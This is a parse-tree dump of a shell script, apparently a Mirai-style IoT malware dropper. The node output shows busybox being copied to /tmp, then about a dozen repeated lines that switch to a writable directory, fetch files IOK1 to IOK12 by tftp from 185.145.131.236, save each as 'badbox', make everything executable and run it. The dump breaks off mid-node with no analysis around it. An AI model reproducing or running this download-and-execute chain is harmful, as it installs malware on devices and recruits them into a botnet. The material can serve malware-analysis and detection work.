CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 172), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 135), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 116), word='IOK1'),
    WordNode(lineno=4, pos=(117, 119), word='-g'),
    WordNode(lineno=4, pos=(120, 135), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(135, 136)),
  CommandNode(lineno=4, pos=(136, 152), parts=[
    WordNode(lineno=4, pos=(136, 139), word='cat'),
    WordNode(lineno=4, pos=(140, 144), word='IOK1'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(146, 152), word='badbox'), pos=(145, 152), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(152, 153)),
  CommandNode(lineno=4, pos=(153, 163), parts=[
    WordNode(lineno=4, pos=(153, 158), word='chmod'),
    WordNode(lineno=4, pos=(159, 161), word='+x'),
    WordNode(lineno=4, pos=(162, 163), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(163, 164)),
  CommandNode(lineno=4, pos=(164, 172), parts=[
    WordNode(lineno=4, pos=(164, 172), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(173, 296), parts=[
  CommandNode(lineno=5, pos=(173, 180), parts=[
    WordNode(lineno=5, pos=(173, 175), word='cd'),
    WordNode(lineno=5, pos=(176, 180), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(181, 183)),
  CommandNode(lineno=5, pos=(184, 195), parts=[
    WordNode(lineno=5, pos=(184, 186), word='cd'),
    WordNode(lineno=5, pos=(187, 195), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(196, 198)),
  CommandNode(lineno=5, pos=(199, 206), parts=[
    WordNode(lineno=5, pos=(199, 201), word='cd'),
    WordNode(lineno=5, pos=(202, 206), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(207, 209)),
  CommandNode(lineno=5, pos=(210, 218), parts=[
    WordNode(lineno=5, pos=(210, 212), word='cd'),
    WordNode(lineno=5, pos=(213, 218), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(219, 221)),
  CommandNode(lineno=5, pos=(222, 226), parts=[
    WordNode(lineno=5, pos=(222, 224), word='cd'),
    WordNode(lineno=5, pos=(225, 226), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(226, 227)),
  CommandNode(lineno=5, pos=(228, 259), parts=[
    WordNode(lineno=5, pos=(228, 232), word='tftp'),
    WordNode(lineno=5, pos=(233, 235), word='-r'),
    WordNode(lineno=5, pos=(236, 240), word='IOK2'),
    WordNode(lineno=5, pos=(241, 243), word='-g'),
    WordNode(lineno=5, pos=(244, 259), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(259, 260)),
  CommandNode(lineno=5, pos=(260, 276), parts=[
    WordNode(lineno=5, pos=(260, 263), word='cat'),
    WordNode(lineno=5, pos=(264, 268), word='IOK2'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(270, 276), word='badbox'), pos=(269, 276), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(276, 277)),
  CommandNode(lineno=5, pos=(277, 287), parts=[
    WordNode(lineno=5, pos=(277, 282), word='chmod'),
    WordNode(lineno=5, pos=(283, 285), word='+x'),
    WordNode(lineno=5, pos=(286, 287), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(287, 288)),
  CommandNode(lineno=5, pos=(288, 296), parts=[
    WordNode(lineno=5, pos=(288, 296), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(297, 420), parts=[
  CommandNode(lineno=6, pos=(297, 304), parts=[
    WordNode(lineno=6, pos=(297, 299), word='cd'),
    WordNode(lineno=6, pos=(300, 304), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(305, 307)),
  CommandNode(lineno=6, pos=(308, 319), parts=[
    WordNode(lineno=6, pos=(308, 310), word='cd'),
    WordNode(lineno=6, pos=(311, 319), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(320, 322)),
  CommandNode(lineno=6, pos=(323, 330), parts=[
    WordNode(lineno=6, pos=(323, 325), word='cd'),
    WordNode(lineno=6, pos=(326, 330), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(331, 333)),
  CommandNode(lineno=6, pos=(334, 342), parts=[
    WordNode(lineno=6, pos=(334, 336), word='cd'),
    WordNode(lineno=6, pos=(337, 342), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(343, 345)),
  CommandNode(lineno=6, pos=(346, 350), parts=[
    WordNode(lineno=6, pos=(346, 348), word='cd'),
    WordNode(lineno=6, pos=(349, 350), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(350, 351)),
  CommandNode(lineno=6, pos=(352, 383), parts=[
    WordNode(lineno=6, pos=(352, 356), word='tftp'),
    WordNode(lineno=6, pos=(357, 359), word='-r'),
    WordNode(lineno=6, pos=(360, 364), word='IOK3'),
    WordNode(lineno=6, pos=(365, 367), word='-g'),
    WordNode(lineno=6, pos=(368, 383), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(383, 384)),
  CommandNode(lineno=6, pos=(384, 400), parts=[
    WordNode(lineno=6, pos=(384, 387), word='cat'),
    WordNode(lineno=6, pos=(388, 392), word='IOK3'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(394, 400), word='badbox'), pos=(393, 400), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(400, 401)),
  CommandNode(lineno=6, pos=(401, 411), parts=[
    WordNode(lineno=6, pos=(401, 406), word='chmod'),
    WordNode(lineno=6, pos=(407, 409), word='+x'),
    WordNode(lineno=6, pos=(410, 411), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(411, 412)),
  CommandNode(lineno=6, pos=(412, 420), parts=[
    WordNode(lineno=6, pos=(412, 420), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(421, 544), parts=[
  CommandNode(lineno=7, pos=(421, 428), parts=[
    WordNode(lineno=7, pos=(421, 423), word='cd'),
    WordNode(lineno=7, pos=(424, 428), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(429, 431)),
  CommandNode(lineno=7, pos=(432, 443), parts=[
    WordNode(lineno=7, pos=(432, 434), word='cd'),
    WordNode(lineno=7, pos=(435, 443), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(444, 446)),
  CommandNode(lineno=7, pos=(447, 454), parts=[
    WordNode(lineno=7, pos=(447, 449), word='cd'),
    WordNode(lineno=7, pos=(450, 454), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(455, 457)),
  CommandNode(lineno=7, pos=(458, 466), parts=[
    WordNode(lineno=7, pos=(458, 460), word='cd'),
    WordNode(lineno=7, pos=(461, 466), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(467, 469)),
  CommandNode(lineno=7, pos=(470, 474), parts=[
    WordNode(lineno=7, pos=(470, 472), word='cd'),
    WordNode(lineno=7, pos=(473, 474), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(474, 475)),
  CommandNode(lineno=7, pos=(476, 507), parts=[
    WordNode(lineno=7, pos=(476, 480), word='tftp'),
    WordNode(lineno=7, pos=(481, 483), word='-r'),
    WordNode(lineno=7, pos=(484, 488), word='IOK4'),
    WordNode(lineno=7, pos=(489, 491), word='-g'),
    WordNode(lineno=7, pos=(492, 507), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(507, 508)),
  CommandNode(lineno=7, pos=(508, 524), parts=[
    WordNode(lineno=7, pos=(508, 511), word='cat'),
    WordNode(lineno=7, pos=(512, 516), word='IOK4'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(518, 524), word='badbox'), pos=(517, 524), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(524, 525)),
  CommandNode(lineno=7, pos=(525, 535), parts=[
    WordNode(lineno=7, pos=(525, 530), word='chmod'),
    WordNode(lineno=7, pos=(531, 533), word='+x'),
    WordNode(lineno=7, pos=(534, 535), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(535, 536)),
  CommandNode(lineno=7, pos=(536, 544), parts=[
    WordNode(lineno=7, pos=(536, 544), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(545, 668), parts=[
  CommandNode(lineno=8, pos=(545, 552), parts=[
    WordNode(lineno=8, pos=(545, 547), word='cd'),
    WordNode(lineno=8, pos=(548, 552), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(553, 555)),
  CommandNode(lineno=8, pos=(556, 567), parts=[
    WordNode(lineno=8, pos=(556, 558), word='cd'),
    WordNode(lineno=8, pos=(559, 567), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(568, 570)),
  CommandNode(lineno=8, pos=(571, 578), parts=[
    WordNode(lineno=8, pos=(571, 573), word='cd'),
    WordNode(lineno=8, pos=(574, 578), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(579, 581)),
  CommandNode(lineno=8, pos=(582, 590), parts=[
    WordNode(lineno=8, pos=(582, 584), word='cd'),
    WordNode(lineno=8, pos=(585, 590), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(591, 593)),
  CommandNode(lineno=8, pos=(594, 598), parts=[
    WordNode(lineno=8, pos=(594, 596), word='cd'),
    WordNode(lineno=8, pos=(597, 598), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(598, 599)),
  CommandNode(lineno=8, pos=(600, 631), parts=[
    WordNode(lineno=8, pos=(600, 604), word='tftp'),
    WordNode(lineno=8, pos=(605, 607), word='-r'),
    WordNode(lineno=8, pos=(608, 612), word='IOK5'),
    WordNode(lineno=8, pos=(613, 615), word='-g'),
    WordNode(lineno=8, pos=(616, 631), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(631, 632)),
  CommandNode(lineno=8, pos=(632, 648), parts=[
    WordNode(lineno=8, pos=(632, 635), word='cat'),
    WordNode(lineno=8, pos=(636, 640), word='IOK5'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(642, 648), word='badbox'), pos=(641, 648), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(648, 649)),
  CommandNode(lineno=8, pos=(649, 659), parts=[
    WordNode(lineno=8, pos=(649, 654), word='chmod'),
    WordNode(lineno=8, pos=(655, 657), word='+x'),
    WordNode(lineno=8, pos=(658, 659), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(659, 660)),
  CommandNode(lineno=8, pos=(660, 668), parts=[
    WordNode(lineno=8, pos=(660, 668), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(669, 792), parts=[
  CommandNode(lineno=9, pos=(669, 676), parts=[
    WordNode(lineno=9, pos=(669, 671), word='cd'),
    WordNode(lineno=9, pos=(672, 676), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(677, 679)),
  CommandNode(lineno=9, pos=(680, 691), parts=[
    WordNode(lineno=9, pos=(680, 682), word='cd'),
    WordNode(lineno=9, pos=(683, 691), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(692, 694)),
  CommandNode(lineno=9, pos=(695, 702), parts=[
    WordNode(lineno=9, pos=(695, 697), word='cd'),
    WordNode(lineno=9, pos=(698, 702), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(703, 705)),
  CommandNode(lineno=9, pos=(706, 714), parts=[
    WordNode(lineno=9, pos=(706, 708), word='cd'),
    WordNode(lineno=9, pos=(709, 714), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(715, 717)),
  CommandNode(lineno=9, pos=(718, 722), parts=[
    WordNode(lineno=9, pos=(718, 720), word='cd'),
    WordNode(lineno=9, pos=(721, 722), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(722, 723)),
  CommandNode(lineno=9, pos=(724, 755), parts=[
    WordNode(lineno=9, pos=(724, 728), word='tftp'),
    WordNode(lineno=9, pos=(729, 731), word='-r'),
    WordNode(lineno=9, pos=(732, 736), word='IOK6'),
    WordNode(lineno=9, pos=(737, 739), word='-g'),
    WordNode(lineno=9, pos=(740, 755), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(755, 756)),
  CommandNode(lineno=9, pos=(756, 772), parts=[
    WordNode(lineno=9, pos=(756, 759), word='cat'),
    WordNode(lineno=9, pos=(760, 764), word='IOK6'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(766, 772), word='badbox'), pos=(765, 772), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(772, 773)),
  CommandNode(lineno=9, pos=(773, 783), parts=[
    WordNode(lineno=9, pos=(773, 778), word='chmod'),
    WordNode(lineno=9, pos=(779, 781), word='+x'),
    WordNode(lineno=9, pos=(782, 783), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(783, 784)),
  CommandNode(lineno=9, pos=(784, 792), parts=[
    WordNode(lineno=9, pos=(784, 792), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(793, 916), parts=[
  CommandNode(lineno=10, pos=(793, 800), parts=[
    WordNode(lineno=10, pos=(793, 795), word='cd'),
    WordNode(lineno=10, pos=(796, 800), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(801, 803)),
  CommandNode(lineno=10, pos=(804, 815), parts=[
    WordNode(lineno=10, pos=(804, 806), word='cd'),
    WordNode(lineno=10, pos=(807, 815), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(816, 818)),
  CommandNode(lineno=10, pos=(819, 826), parts=[
    WordNode(lineno=10, pos=(819, 821), word='cd'),
    WordNode(lineno=10, pos=(822, 826), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 838), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 838), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(839, 841)),
  CommandNode(lineno=10, pos=(842, 846), parts=[
    WordNode(lineno=10, pos=(842, 844), word='cd'),
    WordNode(lineno=10, pos=(845, 846), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(846, 847)),
  CommandNode(lineno=10, pos=(848, 879), parts=[
    WordNode(lineno=10, pos=(848, 852), word='tftp'),
    WordNode(lineno=10, pos=(853, 855), word='-r'),
    WordNode(lineno=10, pos=(856, 860), word='IOK7'),
    WordNode(lineno=10, pos=(861, 863), word='-g'),
    WordNode(lineno=10, pos=(864, 879), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(879, 880)),
  CommandNode(lineno=10, pos=(880, 896), parts=[
    WordNode(lineno=10, pos=(880, 883), word='cat'),
    WordNode(lineno=10, pos=(884, 888), word='IOK7'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(890, 896), word='badbox'), pos=(889, 896), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(896, 897)),
  CommandNode(lineno=10, pos=(897, 907), parts=[
    WordNode(lineno=10, pos=(897, 902), word='chmod'),
    WordNode(lineno=10, pos=(903, 905), word='+x'),
    WordNode(lineno=10, pos=(906, 907), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(907, 908)),
  CommandNode(lineno=10, pos=(908, 916), parts=[
    WordNode(lineno=10, pos=(908, 916), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(917, 1040), parts=[
  CommandNode(lineno=11, pos=(917, 924), parts=[
    WordNode(lineno=11, pos=(917, 919), word='cd'),
    WordNode(lineno=11, pos=(920, 924), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(925, 927)),
  CommandNode(lineno=11, pos=(928, 939), parts=[
    WordNode(lineno=11, pos=(928, 930), word='cd'),
    WordNode(lineno=11, pos=(931, 939), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(940, 942)),
  CommandNode(lineno=11, pos=(943, 950), parts=[
    WordNode(lineno=11, pos=(943, 945), word='cd'),
    WordNode(lineno=11, pos=(946, 950), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(951, 953)),
  CommandNode(lineno=11, pos=(954, 962), parts=[
    WordNode(lineno=11, pos=(954, 956), word='cd'),
    WordNode(lineno=11, pos=(957, 962), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(963, 965)),
  CommandNode(lineno=11, pos=(966, 970), parts=[
    WordNode(lineno=11, pos=(966, 968), word='cd'),
    WordNode(lineno=11, pos=(969, 970), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(970, 971)),
  CommandNode(lineno=11, pos=(972, 1003), parts=[
    WordNode(lineno=11, pos=(972, 976), word='tftp'),
    WordNode(lineno=11, pos=(977, 979), word='-r'),
    WordNode(lineno=11, pos=(980, 984), word='IOK8'),
    WordNode(lineno=11, pos=(985, 987), word='-g'),
    WordNode(lineno=11, pos=(988, 1003), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1003, 1004)),
  CommandNode(lineno=11, pos=(1004, 1020), parts=[
    WordNode(lineno=11, pos=(1004, 1007), word='cat'),
    WordNode(lineno=11, pos=(1008, 1012), word='IOK8'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1014, 1020), word='badbox'), pos=(1013, 1020), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1020, 1021)),
  CommandNode(lineno=11, pos=(1021, 1031), parts=[
    WordNode(lineno=11, pos=(1021, 1026), word='chmod'),
    WordNode(lineno=11, pos=(1027, 1029), word='+x'),
    WordNode(lineno=11, pos=(1030, 1031), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1031, 1032)),
  CommandNode(lineno=11, pos=(1032, 1040), parts=[
    WordNode(lineno=11, pos=(1032, 1040), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1041, 1164), parts=[
  CommandNode(lineno=12, pos=(1041, 1048), parts=[
    WordNode(lineno=12, pos=(1041, 1043), word='cd'),
    WordNode(lineno=12, pos=(1044, 1048), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1049, 1051)),
  CommandNode(lineno=12, pos=(1052, 1063), parts=[
    WordNode(lineno=12, pos=(1052, 1054), word='cd'),
    WordNode(lineno=12, pos=(1055, 1063), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1064, 1066)),
  CommandNode(lineno=12, pos=(1067, 1074), parts=[
    WordNode(lineno=12, pos=(1067, 1069), word='cd'),
    WordNode(lineno=12, pos=(1070, 1074), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1075, 1077)),
  CommandNode(lineno=12, pos=(1078, 1086), parts=[
    WordNode(lineno=12, pos=(1078, 1080), word='cd'),
    WordNode(lineno=12, pos=(1081, 1086), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1087, 1089)),
  CommandNode(lineno=12, pos=(1090, 1094), parts=[
    WordNode(lineno=12, pos=(1090, 1092), word='cd'),
    WordNode(lineno=12, pos=(1093, 1094), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1094, 1095)),
  CommandNode(lineno=12, pos=(1096, 1127), parts=[
    WordNode(lineno=12, pos=(1096, 1100), word='tftp'),
    WordNode(lineno=12, pos=(1101, 1103), word='-r'),
    WordNode(lineno=12, pos=(1104, 1108), word='IOK9'),
    WordNode(lineno=12, pos=(1109, 1111), word='-g'),
    WordNode(lineno=12, pos=(1112, 1127), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1127, 1128)),
  CommandNode(lineno=12, pos=(1128, 1144), parts=[
    WordNode(lineno=12, pos=(1128, 1131), word='cat'),
    WordNode(lineno=12, pos=(1132, 1136), word='IOK9'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1138, 1144), word='badbox'), pos=(1137, 1144), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1144, 1145)),
  CommandNode(lineno=12, pos=(1145, 1155), parts=[
    WordNode(lineno=12, pos=(1145, 1150), word='chmod'),
    WordNode(lineno=12, pos=(1151, 1153), word='+x'),
    WordNode(lineno=12, pos=(1154, 1155), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1155, 1156)),
  CommandNode(lineno=12, pos=(1156, 1164), parts=[
    WordNode(lineno=12, pos=(1156, 1164), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1165, 1290), parts=[
  CommandNode(lineno=13, pos=(1165, 1172), parts=[
    WordNode(lineno=13, pos=(1165, 1167), word='cd'),
    WordNode(lineno=13, pos=(1168, 1172), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1173, 1175)),
  CommandNode(lineno=13, pos=(1176, 1187), parts=[
    WordNode(lineno=13, pos=(1176, 1178), word='cd'),
    WordNode(lineno=13, pos=(1179, 1187), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1188, 1190)),
  CommandNode(lineno=13, pos=(1191, 1198), parts=[
    WordNode(lineno=13, pos=(1191, 1193), word='cd'),
    WordNode(lineno=13, pos=(1194, 1198), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1199, 1201)),
  CommandNode(lineno=13, pos=(1202, 1210), parts=[
    WordNode(lineno=13, pos=(1202, 1204), word='cd'),
    WordNode(lineno=13, pos=(1205, 1210), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1211, 1213)),
  CommandNode(lineno=13, pos=(1214, 1218), parts=[
    WordNode(lineno=13, pos=(1214, 1216), word='cd'),
    WordNode(lineno=13, pos=(1217, 1218), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1218, 1219)),
  CommandNode(lineno=13, pos=(1220, 1252), parts=[
    WordNode(lineno=13, pos=(1220, 1224), word='tftp'),
    WordNode(lineno=13, pos=(1225, 1227), word='-r'),
    WordNode(lineno=13, pos=(1228, 1233), word='IOK10'),
    WordNode(lineno=13, pos=(1234, 1236), word='-g'),
    WordNode(lineno=13, pos=(1237, 1252), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1252, 1253)),
  CommandNode(lineno=13, pos=(1253, 1270), parts=[
    WordNode(lineno=13, pos=(1253, 1256), word='cat'),
    WordNode(lineno=13, pos=(1257, 1262), word='IOK10'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1264, 1270), word='badbox'), pos=(1263, 1270), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1270, 1271)),
  CommandNode(lineno=13, pos=(1271, 1281), parts=[
    WordNode(lineno=13, pos=(1271, 1276), word='chmod'),
    WordNode(lineno=13, pos=(1277, 1279), word='+x'),
    WordNode(lineno=13, pos=(1280, 1281), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1281, 1282)),
  CommandNode(lineno=13, pos=(1282, 1290), parts=[
    WordNode(lineno=13, pos=(1282, 1290), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1291, 1416), parts=[
  CommandNode(lineno=14, pos=(1291, 1298), parts=[
    WordNode(lineno=14, pos=(1291, 1293), word='cd'),
    WordNode(lineno=14, pos=(1294, 1298), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1299, 1301)),
  CommandNode(lineno=14, pos=(1302, 1313), parts=[
    WordNode(lineno=14, pos=(1302, 1304), word='cd'),
    WordNode(lineno=14, pos=(1305, 1313), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1314, 1316)),
  CommandNode(lineno=14, pos=(1317, 1324), parts=[
    WordNode(lineno=14, pos=(1317, 1319), word='cd'),
    WordNode(lineno=14, pos=(1320, 1324), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1325, 1327)),
  CommandNode(lineno=14, pos=(1328, 1336), parts=[
    WordNode(lineno=14, pos=(1328, 1330), word='cd'),
    WordNode(lineno=14, pos=(1331, 1336), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1337, 1339)),
  CommandNode(lineno=14, pos=(1340, 1344), parts=[
    WordNode(lineno=14, pos=(1340, 1342), word='cd'),
    WordNode(lineno=14, pos=(1343, 1344), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1344, 1345)),
  CommandNode(lineno=14, pos=(1346, 1378), parts=[
    WordNode(lineno=14, pos=(1346, 1350), word='tftp'),
    WordNode(lineno=14, pos=(1351, 1353), word='-r'),
    WordNode(lineno=14, pos=(1354, 1359), word='IOK11'),
    WordNode(lineno=14, pos=(1360, 1362), word='-g'),
    WordNode(lineno=14, pos=(1363, 1378), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1378, 1379)),
  CommandNode(lineno=14, pos=(1379, 1396), parts=[
    WordNode(lineno=14, pos=(1379, 1382), word='cat'),
    WordNode(lineno=14, pos=(1383, 1388), word='IOK11'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1390, 1396), word='badbox'), pos=(1389, 1396), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1396, 1397)),
  CommandNode(lineno=14, pos=(1397, 1407), parts=[
    WordNode(lineno=14, pos=(1397, 1402), word='chmod'),
    WordNode(lineno=14, pos=(1403, 1405), word='+x'),
    WordNode(lineno=14, pos=(1406, 1407), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1407, 1408)),
  CommandNode(lineno=14, pos=(1408, 1416), parts=[
    WordNode(lineno=14, pos=(1408, 1416), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1417, 1542), parts=[
  CommandNode(lineno=15, pos=(1417, 1424), parts=[
    WordNode(lineno=15, pos=(1417, 1419), word='cd'),
    WordNode(lineno=15, pos=(1420, 1424), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1425, 1427)),
  CommandNode(lineno=15, pos=(1428, 1439), parts=[
    WordNode(lineno=15, pos=(1428, 1430), word='cd'),
    WordNode(lineno=15, pos=(1431, 1439), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1440, 1442)),
  CommandNode(lineno=15, pos=(1443, 1450), parts=[
    WordNode(lineno=15, pos=(1443, 1445), word='cd'),
    WordNode(lineno=15, pos=(1446, 1450), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1451, 1453)),
  CommandNode(lineno=15, pos=(1454, 1462), parts=[
    WordNode(lineno=15, pos=(1454, 1456), word='cd'),
    WordNode(lineno=15, pos=(1457, 1462), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1463, 1465)),
  CommandNode(lineno=15, pos=(1466, 1470), parts=[
    WordNode(lineno=15, pos=(1466, 1468), word='cd'),
    WordNode(lineno=15, pos=(1469, 1470), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1470, 1471)),
  CommandNode(lineno=15, pos=(1472, 1504), parts=[
    WordNode(lineno=15, pos=(1472, 1476), word='tftp'),
    WordNode(lineno=15, pos=(1477, 1479), word='-r'),
    WordNode(lineno=15, pos=(1480, 1485), word='IOK12'),
    WordNode(lineno=15, pos=(1486, 1488), word='-g'),
    WordNode(lineno=15, pos=(1489, 1504), word='185.145.131.236'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1504, 1505)),
  CommandNode(lineno=15, pos=(1505, 1522), parts=[
    WordNode(lineno=15, pos=(1505, 1508), word='cat'),
    WordNode(lineno=15, pos=(1509, 1514), word='IOK12'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1516, 1522), word='badbox'), pos=(1515, 1522), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1522, 1523)),
  CommandNode(lineno=15, pos=(1523, 1533), parts=[
    WordNode(lineno=15, pos=(1523, 1528), word='chmod'),
